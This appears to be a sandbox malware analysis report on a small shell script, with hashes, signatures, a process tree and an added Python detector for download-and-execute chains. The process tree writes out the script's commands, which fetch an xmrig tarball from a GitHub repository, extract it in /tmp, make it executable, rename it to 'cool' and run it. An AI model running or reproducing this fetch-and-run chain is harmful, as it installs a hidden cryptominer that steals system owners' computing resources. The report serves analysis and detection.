Analysis

max time kernel: 48s
max time network: 50s
platform: debian-9_mips
resource: debian9-mipsbe-20240611-en
resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
submitted: 30/10/2024, 13:11

Static task: static1
Behavioral task behavioral1: sample runnb.sh, resource ubuntu1804-amd64-20240611-en
Behavioral task behavioral2: sample runnb.sh, resource debian9-armhf-20240611-en
Behavioral task behavioral3: sample runnb.sh, resource debian9-mipsbe-20240611-en (the run whose results are shown on this page)
Behavioral task behavioral4: sample runnb.sh, resource debian9-mipsel-20240611-en
General

Target: runnb.sh
Size: 213B
MD5: a1189543e2f98f6696c6d857b899ab0a
SHA1: 30b167128357a05cb5ae4d8bd386d63839d99c4d
SHA256: a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
SHA512: 472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef
Malware Config
Signatures

File and Directory Permissions Modification (1 TTPs, 1 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
  pid 766  chmod

Abuse Elevation Control Mechanism: Sudo and Sudo Caching (1 TTPs, 1 IoCs)
Abuse sudo or cached sudo credentials to execute code.
  pid 706  sudo

Reads CPU attributes (1 TTPs, 2 IoCs)
  File opened for reading  /sys/devices/system/cpu/online  exim4
  File opened for reading  /sys/devices/system/cpu/online  exim4
Both reads come from exim4 delivering the sendmail messages spawned under sudo (see the process tree), not from the payload.

Reads runtime system information (14 IoCs listed)
  File opened for reading  /proc/filesystems               mv
  File opened for reading  /proc/sys/kernel/ngroups_max    sudo
  File opened for reading  /proc/filesystems               dpkg
  File opened for reading  /proc/self/fd                   apt
  File opened for reading  /proc/filesystems               dpkg
  File opened for reading  /proc/filesystems               tar
  File opened for reading  /proc/filesystems               sudo
  File opened for reading  /proc/sys/kernel/ngroups_max    sendmail
  File opened for reading  /proc/self/fd                   apt
  File opened for reading  /proc/filesystems               dpkg
  File opened for reading  /proc/filesystems               dpkg
  File opened for reading  /proc/self/stat                 sudo
  File opened for reading  /proc/self/fd                   sudo
  File opened for reading  /proc/sys/kernel/ngroups_max    sendmail

Writes file to tmp directory (8 IoCs)
Malware often drops required files in the /tmp directory.
  File opened for modification  /tmp/fileutl.message.LnZFXF  apt
  File opened for modification  /tmp/fileutl.message.8LbZSq  apt
  File opened for modification  /tmp/fileutl.message.Q3iYUI  apt
  File opened for modification  /tmp/fileutl.message.eXG3n8  apt
  File opened for modification  /tmp/fileutl.message.DhA2ig  apt
  File opened for modification  /tmp/fileutl.message.Ik8e1r  apt
  File opened for modification  /tmp/fileutl.message.7ZewYI  apt
  File opened for modification  /tmp/fileutl.message.aMQ4G4  apt
All eight entries are attributed to apt and are its own temporary files created while the script ran apt install wget; treat this signature as noise from the install step. The sample's own /tmp artifacts (xmrigtar.tar.gz, xmrig, cool) are visible only through the command lines in the process tree below.
Processes

Each line gives image, command line, PID and the signatures attached to that process; indentation shows the parent/child relationship.

/tmp/runnb.sh  /tmp/runnb.sh  (PID 703)
  /usr/bin/sudo  sudo apt install wget  (PID 706)  Abuse Elevation Control Mechanism: Sudo and Sudo Caching; Reads runtime system information
    /usr/sbin/sendmail  sendmail -t  (PID 720)  Reads runtime system information
      /usr/sbin/exim4  /usr/sbin/exim4 -Mc 1t67YY-0000Bc-TS  (PID 734)  Reads CPU attributes
    /usr/sbin/sendmail  sendmail -t  (PID 723)  Reads runtime system information
      /usr/sbin/exim4  /usr/sbin/exim4 -Mc 1t67YY-0000Bf-SA  (PID 733)  Reads CPU attributes
    /usr/bin/apt  apt install wget  (PID 725)  Reads runtime system information; Writes file to tmp directory
      /usr/bin/dpkg  /usr/bin/dpkg --print-foreign-architectures  (PID 732)  Reads runtime system information
      /usr/bin/dpkg  /usr/bin/dpkg --print-foreign-architectures  (PID 739)  Reads runtime system information
  /usr/bin/apt  apt install wget  (PID 758)  Reads runtime system information; Writes file to tmp directory
    /usr/bin/dpkg  /usr/bin/dpkg --print-foreign-architectures  (PID 759)  Reads runtime system information
    /usr/bin/dpkg  /usr/bin/dpkg --print-foreign-architectures  (PID 760)  Reads runtime system information
  /usr/bin/wget  wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz  (PID 764)
  /bin/tar  tar xvf xmrigtar.tar.gz  (PID 765)  Reads runtime system information
  /bin/chmod  chmod +x xmrig  (PID 766)  File and Directory Permissions Modification
  /bin/mv  mv xmrig cool  (PID 767)  Reads runtime system information
  /tmp/cool  ./cool  (PID 768)

Read top to bottom, the script's observable behaviour is: install wget with apt (first under sudo as PID 706/725, then again directly as PID 758), fetch xmrigtar.tar.gz from the orkaroeli/orkaroeliminer GitHub repository, extract it in /tmp, mark the xmrig binary executable, rename it to cool and execute it from /tmp. The sendmail/exim4 and dpkg children are side effects of the sudo and apt steps, not of the payload. Renaming xmrig to cool changes only the process and file name; it defeats name-based miner detection but not hash- or behaviour-based detection.
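The chain above (download, extract, chmod +x, rename, execute from /tmp) is the pattern a detection should key on rather than the file name. As an added example that is not part of the sandbox report, here is a small Python pass over process events; the event list is constructed from the tree above (PIDs, parents, images and command lines as shown, with the dpkg and exim4 children omitted), the (pid, ppid, image, cmdline) schema and the list of world-writable staging directories are assumptions, and sudo handling is simplified to "look at the wrapped command".

```python
import os
import shlex
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str    # executable path as the sandbox reports it
    cmdline: str  # command line as one string, as shown in the tree


# Constructed from the report's process tree (PIDs, parents, images and
# command lines as shown there); dpkg and exim4 children are left out
# because the heuristics below do not look at them.
SAMPLE_EVENTS = [
    ProcEvent(703, 1,   "/tmp/runnb.sh",      "/tmp/runnb.sh"),
    ProcEvent(706, 703, "/usr/bin/sudo",      "sudo apt install wget"),
    ProcEvent(720, 706, "/usr/sbin/sendmail", "sendmail -t"),
    ProcEvent(725, 706, "/usr/bin/apt",       "apt install wget"),
    ProcEvent(758, 703, "/usr/bin/apt",       "apt install wget"),
    ProcEvent(764, 703, "/usr/bin/wget",
              "wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz"),
    ProcEvent(765, 703, "/bin/tar",           "tar xvf xmrigtar.tar.gz"),
    ProcEvent(766, 703, "/bin/chmod",         "chmod +x xmrig"),
    ProcEvent(767, 703, "/bin/mv",            "mv xmrig cool"),
    ProcEvent(768, 703, "/tmp/cool",          "./cool"),
]

WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")  # assumed staging dirs of interest
DOWNLOADERS = {"wget", "curl"}
INSTALLERS = {"apt", "apt-get", "yum", "dnf"}
ARCHIVE_EXT = (".tar", ".tar.gz", ".tgz", ".zip")


def _argv(ev):
    """Split the command line; if wrapped in sudo, look at the wrapped command.
    Simplification: sudo options such as -u are not parsed."""
    try:
        argv = shlex.split(ev.cmdline)
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        argv = ev.cmdline.split()
    if argv and os.path.basename(argv[0]) == "sudo":
        argv = argv[1:]
    return argv


def _grants_exec(mode):
    """True for symbolic modes that add x (+x, u+x, a+rx) or octal modes with any x bit."""
    if "+" in mode:
        return "x" in mode.split("+", 1)[1]
    return mode.isdigit() and (int(mode, 8) & 0o111) != 0


def find_staging_chains(events):
    """Scan each parent's children in PID order for
    download -> (extract) -> chmod +x -> (mv) -> exec from a world-writable dir.
    Returns one finding per parent where the full chain is observed."""
    by_parent = defaultdict(list)
    for ev in events:
        by_parent[ev.ppid].append(ev)

    findings = []
    for ppid, children in by_parent.items():
        url, archive, marked, aliases = None, None, set(), {}
        for ev in sorted(children, key=lambda e: e.pid):
            argv = _argv(ev)
            if not argv:
                continue
            tool = os.path.basename(argv[0])
            if tool in DOWNLOADERS:
                urls = [a for a in argv[1:] if a.startswith(("http://", "https://"))]
                if urls:
                    url = urls[0]
            elif tool in ("tar", "unzip"):
                archive = next((a for a in argv[1:] if a.endswith(ARCHIVE_EXT)), archive)
            elif tool == "chmod":
                operands = [a for a in argv[1:] if not a.startswith("-")]
                if len(operands) >= 2 and _grants_exec(operands[0]):
                    marked.update(operands[1:])
            elif tool == "mv" and len(argv) >= 3:
                aliases[argv[-1]] = argv[-2]  # new name -> name it was given before rename
            elif ev.image.startswith(WORLD_WRITABLE):
                name = os.path.basename(ev.image)
                original = aliases.get(name, name)
                if url and original in marked:
                    findings.append({
                        "parent_pid": ppid, "exec_pid": ev.pid, "url": url,
                        "archive": archive, "binary": original,
                        "renamed_to": name if name != original else None,
                    })
    return findings


def downloaders_installed_then_used(events):
    """Names of downloaders that were installed with a package manager and then
    run in the same trace: tooling staged at runtime, as this script does with wget."""
    installed, used = set(), set()
    for ev in sorted(events, key=lambda e: e.pid):
        argv = _argv(ev)
        tool = os.path.basename(argv[0]) if argv else ""
        if tool in INSTALLERS and "install" in argv:
            installed.update(a for a in argv[argv.index("install") + 1:] if a in DOWNLOADERS)
        elif tool in DOWNLOADERS and tool in installed:
            used.add(tool)
    return sorted(used)


if __name__ == "__main__":
    for f in find_staging_chains(SAMPLE_EVENTS):
        print(f)
    print("downloaders installed then used:", downloaders_installed_then_used(SAMPLE_EVENTS))
```

The rename is handled by following mv aliases back to the chmod'd name, so the finding reports binary=xmrig even though the executed image is /tmp/cool; a rule keyed only on the string "xmrig" in the exec event would miss this sample.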
-
Network
MITRE ATT&CK Enterprise v15
Downloads

None of the captured files below is larger than 1KB, so the xmrig tarball requested by wget (PID 764) is not among them.

Filesize: 843B
MD5: d374316c12d01a213d977ace8aefb99f
SHA1: 0e280e7ec4bc03f7bddac65df4785535cc4f2e69
SHA256: 0ce8f1a190f91fb2b8d28a37ba24c7ba679db84d8d83f3cf95c158c8e48f397b
SHA512: 02abcb2f0774e5141e67e92fb356d96b29a5b947cfd9e937613fce75c7a973151bd1d4231a45b1b66fe089fb0aa7b477943836b7c5e3d15c3a73bbfd5aac1a7e

Filesize: 1KB
MD5: 93689982b9dcbfdbe8131bb5fcb49a9e
SHA1: 0dc7522895cbf2bbf1a5fd02a64a901d1a5836db
SHA256: b58f93d357915929c8df2d6133b16038c418219419242d768facca7650676d72
SHA512: 9017053243c38e2c16c419a467d18e2d1835f68ab9aa86347b62cefcf08edb274a8c5dc260bf53e541d0d3c4ed8f023213d5a22ba16d68a9578a958183e7ceee

Filesize: 128B
MD5: 5b4456a63fab269723b583310afd51ef
SHA1: 0337d3c840f818744e913c861c9a66dede70bfac
SHA256: 3b2faafccae5cd1798ac5c705b4f3d1380f9465b430a710e2f0b79a0f185c645
SHA512: a3790ca6b9bca038a038c3a54877cf468c02fcf9471d26a19b6298cd949af75f2e9163f77f782190b446dfd73dda010b67931cc0aca90654ad29d79748c8c4ca

Filesize: 146B
MD5: 1919bf4cd4bccf341d51c509a5c7ebe6
SHA1: 91176ddc095f402d808c028c4aecd7c27c5df204
SHA256: 7c57d60b55f4f58b5c69169f46b027f69e578520ba3a3aee57c812d0664787cf
SHA512: 4ced20a83bf398c679fd3d8b026f6f29615ccf9a7dcc2f9360698b183872184643c83e6c408668f5eb489ef216c50dea511b7398eb80e78049477a15a04c9d1b

Filesize: 34B
MD5: d7d96d63d643a4ce3e408eba7dfcedc5
SHA1: c53607f95c5c57beafc1d8266646797a035f76ea
SHA256: 21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512: 703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3

Filesize: 915B
MD5: f516ada389b33a9066cc26856b92af86
SHA1: d2d7ecdf754cbc6d3e6057085f834e610ad399b1
SHA256: 09d73ff8d26ef12b22f096c264f1c8af9fbba70f82acb647c7b04fb6594aba77
SHA512: edff4cbefe00f91c193c521c2c52ad3ce8c9247d5f35b190763c50eecbf4ce1de0158d72e903c87a9820e319a4198d832df5d4a1fc65c00a78ae057ecf6e15f3

Filesize: 288B
MD5: 839f294d8baf36fd0f7e105cbb86e207
SHA1: 20c8e237549a848792804818c4a99b5ba62d7543
SHA256: 35b33356a4a8faa3e7f517301cc5947ec2bbb6c0473b7ab964b07892949c7776
SHA512: 0de3a44206482f92cf064dab9f3c8ed6ec4c3f2c46d6225453bf04e250d454d6fc06645dc7ffc996e8e0daabe5ded613bb246793032c5a340bbca8c33e18bee7

Filesize: 89B
MD5: 47b192cbf5345e029b4745b9bf307adc
SHA1: abbaf31e0e9b13b5996c2c35b19d2a20f5862532
SHA256: 990cc6c25c5754e5e3171f603d580db758ddd9c3546e0f0b7eef69918990f4ed
SHA512: 4e1e2d38e294ec27eb8c2784ffd3a45bf4d04a872483dd3e382b54717a435c88a91b5c6c6d97e1d2ac5a3ee1209aaf2d24b9678f8668106df101162a9b64dfa3

Filesize: 288B
MD5: 7f013cb9d365c939aef52ca4782c9e4d
SHA1: 417bd479712caca7a19e22d5769a81fc2fc8bd1c
SHA256: fe1e636dddc8915cbf21efa862e0df84b84b61f6d069b4898c249202fc32f54a
SHA512: 0ff468ae3f824b6ea6638c1bceeeb75a9339f59db37fb6b2ce326808e3ac99f75a1529e2807a35122c2de1cbcbb3ecd2fc1411c52c979524a2683f48d106e140

Filesize: 89B
MD5: a2dd77d1e0ed7340d745a8802e89f869
SHA1: da07b1fafe5c53b3be089126bf27623191246ffa
SHA256: e8b33e8c949d40c3351edb0a9b44f0eb92cf93071e1ed712872e5d9a97401972
SHA512: dbc34f5e4fb99c9e13dc8a83e0de1a317b17574b3a014060cb7ed5a18f051cf544379e85b9a88b9509ec43b3713edc07258737145866bb25847eb1ea726e5988